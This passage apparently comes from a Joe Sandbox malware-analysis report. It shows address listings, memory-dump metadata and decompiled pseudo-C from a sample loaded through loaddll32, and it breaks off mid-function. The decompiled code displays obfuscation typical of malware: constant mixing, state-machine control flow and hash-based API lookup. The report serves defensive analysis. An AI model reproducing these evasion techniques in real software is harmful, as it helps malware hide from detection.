                                                                                                                                                                            0x02f68727
                                                                                                                                                                            0x02f6872e
                                                                                                                                                                            0x02f68735
                                                                                                                                                                            0x02f6873c
                                                                                                                                                                            0x02f68743
                                                                                                                                                                            0x02f6874a
                                                                                                                                                                            0x02f68751
                                                                                                                                                                            0x02f68758
                                                                                                                                                                            0x02f68763
                                                                                                                                                                            0x02f6876a
                                                                                                                                                                            0x02f68773
                                                                                                                                                                            0x02f68777
                                                                                                                                                                            0x02f68781
                                                                                                                                                                            0x02f68784
                                                                                                                                                                            0x02f68787
                                                                                                                                                                            0x02f68788
                                                                                                                                                                            0x02f68789
                                                                                                                                                                            0x02f68791
                                                                                                                                                                            0x02f687cc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f687fe
                                                                                                                                                                            0x02f687d0
                                                                                                                                                                            0x02f687e7
                                                                                                                                                                            0x02f687f5
                                                                                                                                                                            0x02f687d2
                                                                                                                                                                            0x02f687d5
                                                                                                                                                                            0x02f687d6
                                                                                                                                                                            0x02f687d7
                                                                                                                                                                            0x02f687d8
                                                                                                                                                                            0x02f687d8
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: [$R[+$Y$v@
                                                                                                                                                                            • API String ID: 0-1276245682
                                                                                                                                                                            • Opcode ID: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
                                                                                                                                                                            • Instruction ID: 4135a18180531f52d6f3ba12811d26df56a82b789d696f9ffe92e39c316ac37c
                                                                                                                                                                            • Opcode Fuzzy Hash: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
                                                                                                                                                                            • Instruction Fuzzy Hash: CB612172C00209EFCF08CFE0D94A9EEBBB5FB48304F208159E915BA250D7B55A55CFA4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E02F69A01(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				void* _t106;
                                                                                                                                                                            				intOrPtr _t127;
                                                                                                                                                                            				void* _t128;
                                                                                                                                                                            				void* _t130;
                                                                                                                                                                            				intOrPtr _t143;
                                                                                                                                                                            				void* _t144;
                                                                                                                                                                            				void* _t145;
                                                                                                                                                                            				signed int _t146;
                                                                                                                                                                            				signed int _t147;
                                                                                                                                                                            				signed int _t148;
                                                                                                                                                                            				void* _t150;
                                                                                                                                                                            				void* _t151;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_t144 = __edx;
                                                                                                                                                                            				_t128 = __ecx;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t106);
                                                                                                                                                                            				_v4 = 0x81363a;
                                                                                                                                                                            				_t151 = _t150 + 0x14;
                                                                                                                                                                            				_v4 = _v4 | 0xe86970e7;
                                                                                                                                                                            				_v4 = _v4 ^ 0xe8e8406c;
                                                                                                                                                                            				_t145 = 0;
                                                                                                                                                                            				_v8 = 0xe36f3c;
                                                                                                                                                                            				_t130 = 0x9d12efa;
                                                                                                                                                                            				_t10 =  &_v8; // 0xe36f3c
                                                                                                                                                                            				_t146 = 0x18;
                                                                                                                                                                            				_v8 =  *_t10 / _t146;
                                                                                                                                                                            				_v8 = _v8 ^ 0x000ac4f9;
                                                                                                                                                                            				_v28 = 0x86ae71;
                                                                                                                                                                            				_v28 = _v28 + 0x307d;
                                                                                                                                                                            				_v28 = _v28 ^ 0x3f5774ce;
                                                                                                                                                                            				_v28 = _v28 ^ 0x3fdb82be;
                                                                                                                                                                            				_v12 = 0xd5596e;
                                                                                                                                                                            				_t147 = 0x24;
                                                                                                                                                                            				_v12 = _v12 * 0x75;
                                                                                                                                                                            				_v12 = _v12 ^ 0x618cdae6;
                                                                                                                                                                            				_v16 = 0xa0cb2;
                                                                                                                                                                            				_v16 = _v16 + 0x618a;
                                                                                                                                                                            				_v16 = _v16 + 0xfb99;
                                                                                                                                                                            				_v16 = _v16 ^ 0x0001ef53;
                                                                                                                                                                            				_v20 = 0xb65aa2;
                                                                                                                                                                            				_v20 = _v20 | 0x7ee7663c;
                                                                                                                                                                            				_v20 = _v20 + 0xffff14a1;
                                                                                                                                                                            				_v20 = _v20 ^ 0x7ef81620;
                                                                                                                                                                            				_v24 = 0x69cefc;
                                                                                                                                                                            				_v24 = _v24 * 5;
                                                                                                                                                                            				_v24 = _v24 ^ 0x0216a415;
                                                                                                                                                                            				_v44 = 0xc8ca94;
                                                                                                                                                                            				_v44 = _v44 * 0x55;
                                                                                                                                                                            				_v44 = _v44 << 0xc;
                                                                                                                                                                            				_v44 = _v44 >> 2;
                                                                                                                                                                            				_v44 = _v44 ^ 0x2d01fb93;
                                                                                                                                                                            				_v32 = 0xaa7e08;
                                                                                                                                                                            				_v32 = _v32 << 6;
                                                                                                                                                                            				_v32 = _v32 / _t147;
                                                                                                                                                                            				_v32 = _v32 | 0xdbfc63c4;
                                                                                                                                                                            				_v32 = _v32 ^ 0xdbf76cca;
                                                                                                                                                                            				_v36 = 0x12ed95;
                                                                                                                                                                            				_v36 = _v36 + 0xd11f;
                                                                                                                                                                            				_t148 = 0x64;
                                                                                                                                                                            				_v36 = _v36 / _t148;
                                                                                                                                                                            				_v36 = _v36 ^ 0x700cfa35;
                                                                                                                                                                            				_v36 = _v36 ^ 0x700e1ad8;
                                                                                                                                                                            				_v40 = 0xf66f66;
                                                                                                                                                                            				_v40 = _v40 + 0xffff4d0b;
                                                                                                                                                                            				_v40 = _v40 + 0xffffdddb;
                                                                                                                                                                            				_v40 = _v40 + 0xffff052c;
                                                                                                                                                                            				_v40 = _v40 ^ 0x00f507b6;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t130 != 0x348ce2d) {
                                                                                                                                                                            						if(_t130 == 0x5264aba) {
                                                                                                                                                                            							_t143 =  *0x2f76228; // 0x0
                                                                                                                                                                            							E02F72B09(_v32, _t143, _v36, _v40);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t130 == 0x5e19b60) {
                                                                                                                                                                            								if(E02F73EE9() != 0) {
                                                                                                                                                                            									_t130 = 0x348ce2d;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t130 == 0x8610059) {
                                                                                                                                                                            									E02F5DCA0();
                                                                                                                                                                            									_t130 = 0x5264aba;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t130 != 0x9d12efa) {
                                                                                                                                                                            										goto L12;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_push(_t130);
                                                                                                                                                                            										_push(_t130);
                                                                                                                                                                            										_t127 = E02F5C5D8(0x30);
                                                                                                                                                                            										_t151 = _t151 + 0xc;
                                                                                                                                                                            										 *0x2f76228 = _t127;
                                                                                                                                                                            										_t130 = 0x5e19b60;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L15:
                                                                                                                                                                            						return _t145;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t145 = E02F53271(_v16, _t144, _v20, _t128, _v24, _v44);
                                                                                                                                                                            					_t151 = _t151 + 0x10;
                                                                                                                                                                            					if(_t145 == 0) {
                                                                                                                                                                            						_t130 = 0x8610059;
                                                                                                                                                                            						goto L12;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L15;
                                                                                                                                                                            					L12:
                                                                                                                                                                            				} while (_t130 != 0xbdf1695);
                                                                                                                                                                            				goto L15;
                                                                                                                                                                            			}


























                                                                                                                                                                            0x02f69a08
                                                                                                                                                                            0x02f69a0c
                                                                                                                                                                            0x02f69a0e
                                                                                                                                                                            0x02f69a10
                                                                                                                                                                            0x02f69a14
                                                                                                                                                                            0x02f69a18
                                                                                                                                                                            0x02f69a19
                                                                                                                                                                            0x02f69a1a
                                                                                                                                                                            0x02f69a1f
                                                                                                                                                                            0x02f69a27
                                                                                                                                                                            0x02f69a2a
                                                                                                                                                                            0x02f69a34
                                                                                                                                                                            0x02f69a3c
                                                                                                                                                                            0x02f69a3e
                                                                                                                                                                            0x02f69a46
                                                                                                                                                                            0x02f69a4b
                                                                                                                                                                            0x02f69a51
                                                                                                                                                                            0x02f69a56
                                                                                                                                                                            0x02f69a5c
                                                                                                                                                                            0x02f69a64
                                                                                                                                                                            0x02f69a6c
                                                                                                                                                                            0x02f69a74
                                                                                                                                                                            0x02f69a7c
                                                                                                                                                                            0x02f69a84
                                                                                                                                                                            0x02f69a91
                                                                                                                                                                            0x02f69a94
                                                                                                                                                                            0x02f69a98
                                                                                                                                                                            0x02f69aa0
                                                                                                                                                                            0x02f69aa8
                                                                                                                                                                            0x02f69ab0
                                                                                                                                                                            0x02f69ab8
                                                                                                                                                                            0x02f69ac0
                                                                                                                                                                            0x02f69ac8
                                                                                                                                                                            0x02f69ad0
                                                                                                                                                                            0x02f69ad8
                                                                                                                                                                            0x02f69ae0
                                                                                                                                                                            0x02f69af5
                                                                                                                                                                            0x02f69af9
                                                                                                                                                                            0x02f69b01
                                                                                                                                                                            0x02f69b0e
                                                                                                                                                                            0x02f69b12
                                                                                                                                                                            0x02f69b17
                                                                                                                                                                            0x02f69b1c
                                                                                                                                                                            0x02f69b24
                                                                                                                                                                            0x02f69b2c
                                                                                                                                                                            0x02f69b39
                                                                                                                                                                            0x02f69b3d
                                                                                                                                                                            0x02f69b45
                                                                                                                                                                            0x02f69b4d
                                                                                                                                                                            0x02f69b55
                                                                                                                                                                            0x02f69b61
                                                                                                                                                                            0x02f69b69
                                                                                                                                                                            0x02f69b6d
                                                                                                                                                                            0x02f69b75
                                                                                                                                                                            0x02f69b7d
                                                                                                                                                                            0x02f69b85
                                                                                                                                                                            0x02f69b8d
                                                                                                                                                                            0x02f69b95
                                                                                                                                                                            0x02f69b9d
                                                                                                                                                                            0x02f69ba5
                                                                                                                                                                            0x02f69ba5
                                                                                                                                                                            0x02f69baf
                                                                                                                                                                            0x02f69c4a
                                                                                                                                                                            0x02f69c54
                                                                                                                                                                            0x02f69bb5
                                                                                                                                                                            0x02f69bbb
                                                                                                                                                                            0x02f69c08
                                                                                                                                                                            0x02f69c0a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f69c0a
                                                                                                                                                                            0x02f69bbd
                                                                                                                                                                            0x02f69bc3
                                                                                                                                                                            0x02f69bf5
                                                                                                                                                                            0x02f69bfa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f69bc5
                                                                                                                                                                            0x02f69bcb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f69bcd
                                                                                                                                                                            0x02f69bdd
                                                                                                                                                                            0x02f69bde
                                                                                                                                                                            0x02f69be1
                                                                                                                                                                            0x02f69be6
                                                                                                                                                                            0x02f69be9
                                                                                                                                                                            0x02f69bee
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f69bee
                                                                                                                                                                            0x02f69bcb
                                                                                                                                                                            0x02f69bc3
                                                                                                                                                                            0x02f69bbb
                                                                                                                                                                            0x02f69c5c
                                                                                                                                                                            0x02f69c64
                                                                                                                                                                            0x02f69c64
                                                                                                                                                                            0x02f69c26
                                                                                                                                                                            0x02f69c28
                                                                                                                                                                            0x02f69c2d
                                                                                                                                                                            0x02f69c2f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f69c2f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f69c34
                                                                                                                                                                            0x02f69c34
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: <f~$<o$l@$}0
                                                                                                                                                                            • API String ID: 0-758050912
                                                                                                                                                                            • Opcode ID: 778a98b24e93b59649a4c910f2d3cd3d51745de772469b0cde7e844b6870753e
                                                                                                                                                                            • Instruction ID: 780e31e34ddedf998595b7690b0ebd764adbf1a34cb32aa2ab528697be1a3a3a
                                                                                                                                                                            • Opcode Fuzzy Hash: 778a98b24e93b59649a4c910f2d3cd3d51745de772469b0cde7e844b6870753e
                                                                                                                                                                            • Instruction Fuzzy Hash: 7B517571508341AFC744CF26D88942FBBE2EFC8798F50591DF69696260D3B18A48CF8B
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                            			E02F52194(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				void* _t67;
                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                            				signed int _t81;
                                                                                                                                                                            				void* _t88;
                                                                                                                                                                            
                                                                                                                                                                            				_t88 = __ecx;
                                                                                                                                                                            				E02F6FE29(_t67);
                                                                                                                                                                            				_v28 = 0x23b662;
                                                                                                                                                                            				_v24 = 0;
                                                                                                                                                                            				_v12 = 0x5a4623;
                                                                                                                                                                            				_v12 = _v12 + 0x2367;
                                                                                                                                                                            				_v12 = _v12 ^ 0x11a2f25e;
                                                                                                                                                                            				_v12 = _v12 << 5;
                                                                                                                                                                            				_v12 = _v12 ^ 0x3f16c1ec;
                                                                                                                                                                            				_v20 = 0x4a1b7a;
                                                                                                                                                                            				_v20 = _v20 ^ 0x2a8c83f5;
                                                                                                                                                                            				_v20 = _v20 ^ 0x0b06bd0c;
                                                                                                                                                                            				_v20 = _v20 ^ 0x21c6558f;
                                                                                                                                                                            				_v8 = 0x75635a;
                                                                                                                                                                            				_v8 = _v8 >> 0xc;
                                                                                                                                                                            				_t80 = 0x19;
                                                                                                                                                                            				_v8 = _v8 / _t80;
                                                                                                                                                                            				_v8 = _v8 ^ 0x5f69645e;
                                                                                                                                                                            				_v8 = _v8 ^ 0x5f68d09e;
                                                                                                                                                                            				_v16 = 0xc2b090;
                                                                                                                                                                            				_v16 = _v16 + 0xffff85c8;
                                                                                                                                                                            				_t81 = 0x7c;
                                                                                                                                                                            				_v16 = _v16 / _t81;
                                                                                                                                                                            				_v16 = _v16 ^ 0x000d5e79;
                                                                                                                                                                            				_t77 = E02F5EB52(_t81, _t81, 0x525cea78, 0xe3, 0x4be980c1);
                                                                                                                                                                            				return  *_t77(_a56, _a36, _a48, 0, 0, _a16, _a60, _t88, _a44, _a52, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, 0, _a32, _a36, _a40, _a44, _a48, _a52, _a56, _a60);
                                                                                                                                                                            			}














                                                                                                                                                                            0x02f521a1
                                                                                                                                                                            0x02f521cb
                                                                                                                                                                            0x02f521d0
                                                                                                                                                                            0x02f521da
                                                                                                                                                                            0x02f521df
                                                                                                                                                                            0x02f521e6
                                                                                                                                                                            0x02f521ed
                                                                                                                                                                            0x02f521f4
                                                                                                                                                                            0x02f521f8
                                                                                                                                                                            0x02f521ff
                                                                                                                                                                            0x02f52206
                                                                                                                                                                            0x02f5220d
                                                                                                                                                                            0x02f52214
                                                                                                                                                                            0x02f5221b
                                                                                                                                                                            0x02f52222
                                                                                                                                                                            0x02f5222b
                                                                                                                                                                            0x02f52230
                                                                                                                                                                            0x02f52235
                                                                                                                                                                            0x02f5223c
                                                                                                                                                                            0x02f52243
                                                                                                                                                                            0x02f5224a
                                                                                                                                                                            0x02f52254
                                                                                                                                                                            0x02f5225c
                                                                                                                                                                            0x02f5225f
                                                                                                                                                                            0x02f5227e
                                                                                                                                                                            0x02f522a5

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: #FZ$^di_$g#$y^
                                                                                                                                                                            • API String ID: 0-3614166594
                                                                                                                                                                            • Opcode ID: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
                                                                                                                                                                            • Instruction ID: 3fd85ba3f7b7b03434fe21d6f6320fe5fa95fab5757c629980911838868ad2c3
                                                                                                                                                                            • Opcode Fuzzy Hash: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
                                                                                                                                                                            • Instruction Fuzzy Hash: 3A31F272800208FBCF05DFA5DD098DEBFB6FF89304F508159FA15A6120D3B68A60AF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E02F68FAE(intOrPtr* __ecx) {
                                                                                                                                                                            				intOrPtr* _v4;
                                                                                                                                                                            				char _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				void* _t364;
                                                                                                                                                                            				void* _t367;
                                                                                                                                                                            				void* _t375;
                                                                                                                                                                            				void* _t379;
                                                                                                                                                                            				signed int _t382;
                                                                                                                                                                            				signed int _t383;
                                                                                                                                                                            				signed int _t384;
                                                                                                                                                                            				signed int _t385;
                                                                                                                                                                            				signed int _t386;
                                                                                                                                                                            				signed int _t387;
                                                                                                                                                                            				intOrPtr _t420;
                                                                                                                                                                            				intOrPtr* _t425;
                                                                                                                                                                            				void* _t429;
                                                                                                                                                                            				signed int* _t430;
                                                                                                                                                                            
                                                                                                                                                                            				_t430 =  &_v164;
                                                                                                                                                                            				_v44 = 0xc56d85;
                                                                                                                                                                            				_v44 = _v44 | 0x6747c0a0;
                                                                                                                                                                            				_v44 = _v44 ^ 0x67c7eda5;
                                                                                                                                                                            				_v148 = 0xd0221b;
                                                                                                                                                                            				_v148 = _v148 + 0xb86b;
                                                                                                                                                                            				_t425 = __ecx;
                                                                                                                                                                            				_t429 = 0;
                                                                                                                                                                            				_t382 = 0x2d;
                                                                                                                                                                            				_v4 = __ecx;
                                                                                                                                                                            				_t379 = 0x771143;
                                                                                                                                                                            				_v148 = _v148 / _t382;
                                                                                                                                                                            				_v148 = _v148 * 0x66;
                                                                                                                                                                            				_v148 = _v148 ^ 0x01d966be;
                                                                                                                                                                            				_v152 = 0x268288;
                                                                                                                                                                            				_v152 = _v152 + 0xc42a;
                                                                                                                                                                            				_v152 = _v152 * 0x1a;
                                                                                                                                                                            				_v152 = _v152 | 0x9e13f09a;
                                                                                                                                                                            				_v152 = _v152 ^ 0x9ffffe9e;
                                                                                                                                                                            				_v84 = 0x856365;
                                                                                                                                                                            				_v84 = _v84 + 0xffff26a7;
                                                                                                                                                                            				_v84 = _v84 << 4;
                                                                                                                                                                            				_v84 = _v84 ^ 0x0848a0c0;
                                                                                                                                                                            				_v72 = 0xf332ed;
                                                                                                                                                                            				_v72 = _v72 ^ 0xef6a6dd6;
                                                                                                                                                                            				_v72 = _v72 >> 6;
                                                                                                                                                                            				_v72 = _v72 ^ 0x03be657c;
                                                                                                                                                                            				_v120 = 0xd51e66;
                                                                                                                                                                            				_v120 = _v120 | 0x823b6191;
                                                                                                                                                                            				_v120 = _v120 + 0xffffb8fb;
                                                                                                                                                                            				_v120 = _v120 + 0xaa7;
                                                                                                                                                                            				_v120 = _v120 ^ 0x82fd9684;
                                                                                                                                                                            				_v108 = 0xd10da2;
                                                                                                                                                                            				_v108 = _v108 + 0xffff1c26;
                                                                                                                                                                            				_v108 = _v108 + 0xffff12ce;
                                                                                                                                                                            				_v108 = _v108 ^ 0x00cc3eec;
                                                                                                                                                                            				_v76 = 0x14aa13;
                                                                                                                                                                            				_v76 = _v76 ^ 0xa7d92c4a;
                                                                                                                                                                            				_v76 = _v76 >> 0xc;
                                                                                                                                                                            				_v76 = _v76 ^ 0x000074b4;
                                                                                                                                                                            				_v92 = 0x17a820;
                                                                                                                                                                            				_v92 = _v92 ^ 0x3a93bf92;
                                                                                                                                                                            				_v92 = _v92 | 0x1a458659;
                                                                                                                                                                            				_v92 = _v92 ^ 0x3acb9ffe;
                                                                                                                                                                            				_v144 = 0x9f1ca1;
                                                                                                                                                                            				_v144 = _v144 << 3;
                                                                                                                                                                            				_v144 = _v144 | 0x88246970;
                                                                                                                                                                            				_v144 = _v144 + 0x8e62;
                                                                                                                                                                            				_v144 = _v144 ^ 0x8cf667c6;
                                                                                                                                                                            				_v52 = 0x8da33b;
                                                                                                                                                                            				_v52 = _v52 >> 8;
                                                                                                                                                                            				_v52 = _v52 ^ 0x00059428;
                                                                                                                                                                            				_v96 = 0x1abb08;
                                                                                                                                                                            				_v96 = _v96 ^ 0x6c742edf;
                                                                                                                                                                            				_v96 = _v96 + 0xffff01f6;
                                                                                                                                                                            				_v96 = _v96 ^ 0x6c6614ef;
                                                                                                                                                                            				_v112 = 0x9f0f81;
                                                                                                                                                                            				_v112 = _v112 * 0x6a;
                                                                                                                                                                            				_v112 = _v112 >> 3;
                                                                                                                                                                            				_v112 = _v112 ^ 0x083a0fed;
                                                                                                                                                                            				_v156 = 0x609a24;
                                                                                                                                                                            				_v156 = _v156 + 0xffff683f;
                                                                                                                                                                            				_v156 = _v156 << 5;
                                                                                                                                                                            				_v156 = _v156 + 0xcd31;
                                                                                                                                                                            				_v156 = _v156 ^ 0x0c079756;
                                                                                                                                                                            				_v164 = 0xe5cc1d;
                                                                                                                                                                            				_v164 = _v164 << 7;
                                                                                                                                                                            				_v164 = _v164 | 0x9a492847;
                                                                                                                                                                            				_v164 = _v164 * 0x78;
                                                                                                                                                                            				_v164 = _v164 ^ 0xa012b17f;
                                                                                                                                                                            				_v128 = 0x53ee3c;
                                                                                                                                                                            				_t120 =  &_v128; // 0x53ee3c
                                                                                                                                                                            				_t383 = 0x29;
                                                                                                                                                                            				_v128 =  *_t120 / _t383;
                                                                                                                                                                            				_v128 = _v128 ^ 0x929088a5;
                                                                                                                                                                            				_v128 = _v128 + 0xa7c3;
                                                                                                                                                                            				_v128 = _v128 ^ 0x929242c1;
                                                                                                                                                                            				_v140 = 0x5f30f1;
                                                                                                                                                                            				_v140 = _v140 | 0xd1491927;
                                                                                                                                                                            				_t384 = 0x7c;
                                                                                                                                                                            				_v140 = _v140 / _t384;
                                                                                                                                                                            				_t385 = 0x58;
                                                                                                                                                                            				_v140 = _v140 / _t385;
                                                                                                                                                                            				_v140 = _v140 ^ 0x000295f0;
                                                                                                                                                                            				_v88 = 0x55e174;
                                                                                                                                                                            				_v88 = _v88 ^ 0x7dd6f036;
                                                                                                                                                                            				_v88 = _v88 >> 0xd;
                                                                                                                                                                            				_v88 = _v88 ^ 0x000a8d63;
                                                                                                                                                                            				_v28 = 0xb452eb;
                                                                                                                                                                            				_v28 = _v28 + 0xffff5322;
                                                                                                                                                                            				_v28 = _v28 ^ 0x00ba2bf5;
                                                                                                                                                                            				_v36 = 0x42507a;
                                                                                                                                                                            				_v36 = _v36 | 0xf1dc1e20;
                                                                                                                                                                            				_v36 = _v36 ^ 0xf1d9c77b;
                                                                                                                                                                            				_v80 = 0xc31b4e;
                                                                                                                                                                            				_v80 = _v80 ^ 0xd2ac5232;
                                                                                                                                                                            				_t386 = 0x43;
                                                                                                                                                                            				_v80 = _v80 / _t386;
                                                                                                                                                                            				_v80 = _v80 ^ 0x03298e6e;
                                                                                                                                                                            				_v124 = 0x46c8cc;
                                                                                                                                                                            				_v124 = _v124 << 8;
                                                                                                                                                                            				_v124 = _v124 >> 5;
                                                                                                                                                                            				_v124 = _v124 << 7;
                                                                                                                                                                            				_v124 = _v124 ^ 0x1b2fd4b6;
                                                                                                                                                                            				_v132 = 0x745205;
                                                                                                                                                                            				_v132 = _v132 ^ 0x1862e0ae;
                                                                                                                                                                            				_v132 = _v132 << 5;
                                                                                                                                                                            				_v132 = _v132 >> 6;
                                                                                                                                                                            				_v132 = _v132 ^ 0x0007d289;
                                                                                                                                                                            				_v20 = 0x713f0f;
                                                                                                                                                                            				_v20 = _v20 ^ 0x61c76558;
                                                                                                                                                                            				_v20 = _v20 ^ 0x61bb476a;
                                                                                                                                                                            				_v48 = 0x3998c0;
                                                                                                                                                                            				_v48 = _v48 | 0xd3555304;
                                                                                                                                                                            				_v48 = _v48 ^ 0xd37b9815;
                                                                                                                                                                            				_v160 = 0xe5ad6c;
                                                                                                                                                                            				_v160 = _v160 * 0x3a;
                                                                                                                                                                            				_v160 = _v160 | 0x660736ab;
                                                                                                                                                                            				_v160 = _v160 << 0xd;
                                                                                                                                                                            				_v160 = _v160 ^ 0xefd0e6e0;
                                                                                                                                                                            				_v60 = 0x9fc9f5;
                                                                                                                                                                            				_v60 = _v60 >> 7;
                                                                                                                                                                            				_v60 = _v60 ^ 0x000a96ad;
                                                                                                                                                                            				_v16 = 0xa888b5;
                                                                                                                                                                            				_v16 = _v16 << 0xb;
                                                                                                                                                                            				_v16 = _v16 ^ 0x4445c6cc;
                                                                                                                                                                            				_v104 = 0xee35af;
                                                                                                                                                                            				_v104 = _v104 ^ 0xea83652e;
                                                                                                                                                                            				_v104 = _v104 << 3;
                                                                                                                                                                            				_v104 = _v104 ^ 0x536d6a1f;
                                                                                                                                                                            				_v12 = 0x6066b2;
                                                                                                                                                                            				_v12 = _v12 + 0xb1d6;
                                                                                                                                                                            				_v12 = _v12 ^ 0x00605003;
                                                                                                                                                                            				_v40 = 0x2dba20;
                                                                                                                                                                            				_v40 = _v40 * 0x73;
                                                                                                                                                                            				_v40 = _v40 ^ 0x1485b41c;
                                                                                                                                                                            				_v136 = 0xfcb12d;
                                                                                                                                                                            				_v136 = _v136 << 1;
                                                                                                                                                                            				_v136 = _v136 + 0xaead;
                                                                                                                                                                            				_v136 = _v136 + 0xffffaecb;
